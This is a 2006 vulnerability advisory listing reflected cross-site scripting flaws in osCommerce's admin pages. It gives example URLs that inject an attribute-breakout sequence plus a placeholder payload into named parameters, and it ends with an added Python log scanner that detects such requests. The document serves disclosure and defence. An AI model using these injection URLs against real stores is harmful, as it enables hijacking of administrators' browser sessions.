##########################################
Oscommerce Multiple XSS in admin section.
Vendor url: http://www.oscommerce.com
Advisory: http://lostmon.blogspot.com/2006/11/oscommerce-multiple-xss-in-admin.html
Vendor notify: YES
Exploit available: YES
##########################################

osCommerce contains a flaw that allows a remote cross-site scripting attack. The flaw exists because the application does not validate several parameters submitted to several scripts in the /admin folder. This could allow an attacker to craft a URL that executes arbitrary script in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

####################
versions
####################
Oscommerce-2.2ms2-060817

###################
SOLUTION
###################
No solution was available at this time.

################
timeline
################
Discovered: 29-10-2006
Vendor notify: 20-11-2006
Vendor response / disclosure: 21-11-2006

#################
Examples
#################
If the server has authentication enabled, you need to log in before any of these flaws can be exploited.

-------------------------------
gID param in configuration.php
-------------------------------
http://[Victim]/catalog/admin/configuration.php?gID=1">[XSS-CODE]&cID=3

--------------------------
set param in modules.php
--------------------------
http://localhost/catalog/admin/modules.php?selected_box=modules&set=payment">[XSS-CODE]&osCAdminID=034e6def71e10f0ca58029e93fd361e5
http://localhost/catalog/admin/modules.php?set=payment">[XSS-CODE]&module=pm2checkout
http://localhost/catalog/admin/modules.php?set=ordertotal&module=ot_loworderfee">[XSS-CODE]&action=edit

--------------------------------------------------
option_order_by, value_page, option_page, products_options_name in products_attributes.php
--------------------------------------------------
http://[Victim]/catalog/admin/products_attributes.php?action=update_option&option_id=1&option_order_by=">[XSS-CODE]&products_options_id&option_page=1
http://[Victim]/definitiva/admin/products_attributes.php?option_order_by=products_options_id&value_page=2">[XSS-CODE]
http://[Victim]/definitiva/admin/products_attributes.php?option_page=1&option_order_by=products_options_name">[XSS-CODE]
http://[Victim]/definitiva/admin/products_attributes.php?action=update_option&option_id=1&option_order_by=products_options_id&option_page=1">[XSS-CODE]
http://[Victim]/catalog/admin/products_attributes.php?action=update_option&option_id=1&option_order_by=products_options_id&option_page=1">[XSS-CODE]

---------------------------------------------
lID param in languages.php
---------------------------------------------
http://localhost/definitiva/admin/languages.php?page=1&lID=3">[XSS-CODE]&action=new

-------------------------------
selected_box, cID in customers.php
-------------------------------
http://localhost/definitiva/admin/customers.php?page=1&cID=1[XSS-CODE]&action=edit
http://[Victim]/catalog/admin/customers.php?selected_box=customers">[XSS-CODE]

-------------------------------
spage, zID, sID in geo_zones.php
-------------------------------
http://localhost/definitiva/admin/geo_zones.php?zpage=1&zID=1&action=list&spage=1">[XSS-CODE]&sID=1&saction=edit
http://localhost/definitiva/admin/geo_zones.php?zpage=1&zID=2">[XSS-CODE]&action=list&spage=1&sID=2&saction=edit
http://localhost/definitiva/admin/geo_zones.php?zpage=1&zID=1&action=list&spage=1&sID=1">[XSS-CODE]&saction=new

########################
End
#####################

Thanks to Estrella for being my light.

--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what moves the mind....
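Every PoC above follows the same shape: a parameter value that closes the HTML attribute it is echoed into (`">`) and then injects markup. As an added defender-side example, not part of the advisory or of osCommerce, the Python below scans web-server access-log lines for requests to the admin scripts listed above whose named parameters carry such attribute-breakout characters; the script-to-parameter map and the sample log lines are constructed from the PoC list and are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Admin scripts and the parameters the advisory lists for each (mapping built from the PoC list above).
WATCHED_PARAMS = {
    "configuration.php": {"gID"}, "modules.php": {"set", "module"},
    "products_attributes.php": {"option_order_by", "value_page", "option_page", "products_options_name"},
    "languages.php": {"lID"}, "customers.php": {"selected_box", "cID"},
    "geo_zones.php": {"spage", "zID", "sID"},
}
BREAKOUT = re.compile(r'["<>]')  # closes an attribute or opens a tag, the shape of every PoC above
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<uri>\S+) HTTP/[\d.]+"')  # request field of a combined log line

def suspicious_params(uri):
    """Return (script, param) pairs whose percent-decoded value contains a breakout character."""
    parts = urlsplit(uri)
    if "/admin/" not in parts.path:
        return []
    script = parts.path.rsplit("/", 1)[-1]
    watched = WATCHED_PARAMS.get(script, set())
    hits = []
    # parse_qs percent-decodes values; keep_blank_values keeps bare names such as products_options_id
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name in watched and any(BREAKOUT.search(v) for v in values):
            hits.append((script, name))
    return hits

def scan_log(lines):
    """Return (line_no, script, param) for every request that carries a suspect value."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m:
            findings.extend((n, s, p) for s, p in suspicious_params(m.group("uri")))
    return findings

# Constructed sample access-log lines; [XSS-CODE] stands in for a payload, as in the advisory.
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Nov/2006:10:00:01 +0100] "GET /catalog/admin/configuration.php?gID=1&cID=3 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [21/Nov/2006:10:00:02 +0100] "GET /catalog/admin/configuration.php?gID=1%22%3E%5BXSS-CODE%5D&cID=3 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [21/Nov/2006:10:00:03 +0100] "GET /catalog/admin/modules.php?set=payment%22%3E%5BXSS-CODE%5D&module=pm2checkout HTTP/1.1" 200 7010',
    '10.0.0.5 - - [21/Nov/2006:10:00:04 +0100] "GET /catalog/admin/customers.php?page=1&cID=1%3C%5BXSS-CODE%5D&action=edit HTTP/1.1" 200 4400',
    '10.0.0.9 - - [21/Nov/2006:10:00:05 +0100] "GET /catalog/product_info.php?products_id=1%22%3E HTTP/1.1" 200 9900',
]

if __name__ == "__main__":
    for line_no, script, param in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {script} param {param} carries attribute-breakout characters")
```

The last sample line shows the scoping: a breakout character outside /admin/ is not reported, since this check is keyed to the scripts and parameters the advisory names.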